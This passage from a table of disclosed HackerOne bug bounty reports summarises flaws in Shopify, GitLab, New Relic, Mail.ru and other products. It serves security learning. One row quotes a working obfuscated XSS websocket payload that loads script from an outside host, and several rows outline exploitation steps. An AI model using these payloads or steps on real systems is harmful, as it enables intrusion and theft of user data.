409 | 392 | Path traversal | It is possible to use path traversal in order to access arbitrary paths on the OAuth app as an anonymous user | $500 | Shopify | https://hackerone.com/reports/869888
410 | 393 | Violation of secure design principles | If you change country information in Account settings, HackerOne does not send you a "Your profile was recently changed" notification email. | $500 | HackerOne | https://hackerone.com/reports/961841
411 | 394 | Information disclosure | By fetching a valid token from another store, it was possible to bypass the password-restriction on stores in preview mode. | $1500 | Shopify | https://hackerone.com/reports/961929
412 | 395 | XSS | By setting the name of the folder containing a broken theme to an XSS payload, XSS can be achieved. This requires installing an attacker-supplied theme or write access to the file system. | $300 | WordPress | https://hackerone.com/reports/406289
413 | 396 | XSS | Self-XSS on Timeline by using the `javascript:` protocol | $500 | Shopify | https://hackerone.com/reports/854299
414 | 397 | Improper access control | Script Editor tokens do not expire; thus scripts can still be edited and added if you have the token, even if the Script Editor application is uninstalled. If a script is renamed to an empty character, it can also no longer be seen or edited unless the API is accessed/called manually. | $2000 | Shopify | https://hackerone.com/reports/915940
415 | 398 | Information disclosure | Within the same company, it was possible to access data one should not be able to access when holding the `Auditor` role. | $100 | Visma Public | https://hackerone.com/reports/959897
416 | 399 | Privilege Escalation | By navigating directly to the relevant endpoints instead of relying on the UI, a restricted user is able to create integrations with AWS, even though his role forbids this. | $750 | New Relic | https://hackerone.com/reports/255685
417 | 400 | Privilege Escalation | By logging in to New Relic Synthetics with no permissions and observing calls, you can identify a call returning all data about the monitors and permissions for the group. | $750 | New Relic | https://hackerone.com/reports/320689
418 | 401 | IDOR | By adding a new user to your New Relic account as an admin, you are able to disclose their full name on the `https://alerts.newrelic.com/accounts/ACCOUNT_ID/channels` page | $1500 | New Relic | https://hackerone.com/reports/344309
419 | 402 | IDOR | When creating an account for a new user, the admin cannot see the name of the account holder. This vulnerability allowed an attacker to disclose such data through the API endpoint `https://alerts.newrelic.com/internal_api/1/accounts/YOURACCOUNTNUMBER/users/` | $1500 | New Relic | https://hackerone.com/reports/332381
420 | 403 | Improper access control | If a permanent maintainer creates a mirror and then removes it, any other project maintainer can create a mirror similar to the first one. This is contrary to what the documentation states and can allow an attacker to plant backdoors or push to a repository after being removed from the project. | $3000 | GitLab | https://hackerone.com/reports/819821
421 | 404 | IDOR | By creating an account on customers.gitlab.com, then linking it to the victim's account by using their userId (it is sequential and easy to get), you will: 1. Remove all subscriptions, 2. Get access to all future updates, including credit card registration!, 3. Be able to use the registered information. | $3500 | GitLab | https://hackerone.com/reports/674195
422 | 405 | Privilege Escalation | If a GitLab admin uses the `impersonate` function, the admin cookie is replaced with the user cookie and a "Stop impersonating" button becomes available to return to the admin account. This session shows up in the `sessions` overview of the user, so if the user switches to this session, he can click the "Stop impersonating" button and get admin access. | $10,000 | GitLab | https://hackerone.com/reports/493324
423 | 406 | Logic bug | An attacker was able to run arbitrary pipeline jobs as the victim. By creating a repository and a mirrored project with `trigger pipelines for mirror updates` enabled, and then inviting the victim as an owner, then deleting the original owner, the pipeline will execute in the context of the victim account. | $12,000 | GitLab | https://hackerone.com/reports/894569
424 | 407 | XSS | Stored XSS in groups, by naming the group as an XSS payload - ` ">` - and clicking `New Project` | $2500 | GitLab | https://hackerone.com/reports/647130
425 | 408 | Improper access control | The `jira_status` field has an issue with `sort_by`, allowing an attacker to see if a report is using Jira or not. | $550 | HackerOne | https://hackerone.com/reports/955286
426 | 409 | XSS | Stored XSS on `eaccounting.stage.vismaonline.com` | $250 | Visma Public | https://hackerone.com/reports/897523
427 | 410 | CSRF | Part of the authenticity token used to generate CSRF tokens was disclosed. Using this, an attacker can generate valid CSRF tokens for any arbitrary route. | $500 | Ruby on Rails | https://hackerone.com/reports/732415
428 | 411 | Improper access control | Ability to publish any theme for free, by extracting the ID of the paid theme, and then intercepting the update to a free theme and replacing that ID with the ID of the paid theme. | $2000 | Shopify | https://hackerone.com/reports/927567
429 | 412 | Improper access control | Ability to publish any theme for free via a race condition when installing the theme. This is done by finding a paid theme and clicking the `Try theme` button. Then, while it is installing, issue the PublishLegacy call for a free theme. Then intercept and modify the first GraphQL query to ThemesProcessingLegacy, replacing the theme ID with the paid theme ID. | $2000 | Shopify | https://hackerone.com/reports/953083
430 | 413 | XSS | File upload with a Unicode character and XSS payload causes the created web page to execute the script | $600 | WordPress | https://hackerone.com/reports/179695
431 | 414 | Code injection | XSS to RCE by uploading HTML as part of a snippet. The map function allows arbitrary inclusion of resources, leading to being able to execute any command. There are also multiple issues with storage of payloads in Slack's environment, leading to being able to host code on trusted domains. | $1750 | Slack | https://hackerone.com/reports/783877
432 | 415 | XSS | Due to taking unsanitized input from websockets and rendering it on the recipient's side, it is possible to achieve XSS in support desk conversations and gain access to support tickets and client information. The payload was: `ws.send('{"action":"send_message","data":{"type":2,"uuid":"katO0xuiIy","media_thumb":"xxdata\\" onerror=\\"eval(atob(\'dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vcGl0ci54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7\'));//","media_url":"media-url"},"uuid":"katO0xuiIy","token":"bz+OjfTeBL/BRozszXwKbT10voEb0crFVRWBktvQifQ=","projectId":1,"messengerType":9}')` | $500 | QiWi | https://hackerone.com/reports/512065
433 | 416 | Improper authentication | Due to improper parsing and display of the From address, it was possible to send emails from any @mail.ru address while passing DKIM and DMARC verification, even though the email is spoofed. The bug happens when there are two "From" headers and the incorrect but spoofed address is added as "From: ". This attack is also a replay attack, requiring a previously sent and verified email from the address provider. | $150 | Mail.ru | https://hackerone.com/reports/731878
434 | 417 | IDOR | IDOR in dictor.mail.ru allowed an attacker to get any video's information through a GraphQL query | $2500 | Mail.ru | https://hackerone.com/reports/924914
435 | 418 | Information disclosure | Config files were accessible for warofdragons.my.games, leaking database credentials and other information | $150 | Mail.ru | https://hackerone.com/reports/786609
436 | 419 | CRLF injection | www.starbucks.com/email-prospectt was vulnerable to CRLF injection allowing for header injection (for example injecting CORS headers) or HTTP response splitting, which can be further exploited. | $250 | Starbucks | https://hackerone.com/reports/858650
437 | 420 | XSS | It is possible to achieve stored XSS if an attacker can upload files using Active Storage, by utilizing the proxy functionality included in Ruby on Rails. | $500 | Ruby on Rails | https://hackerone.com/reports/949513
438 | 421 | XSS | It was possible to achieve stored XSS in the Post title on Imgur. This was achieved using a standard `">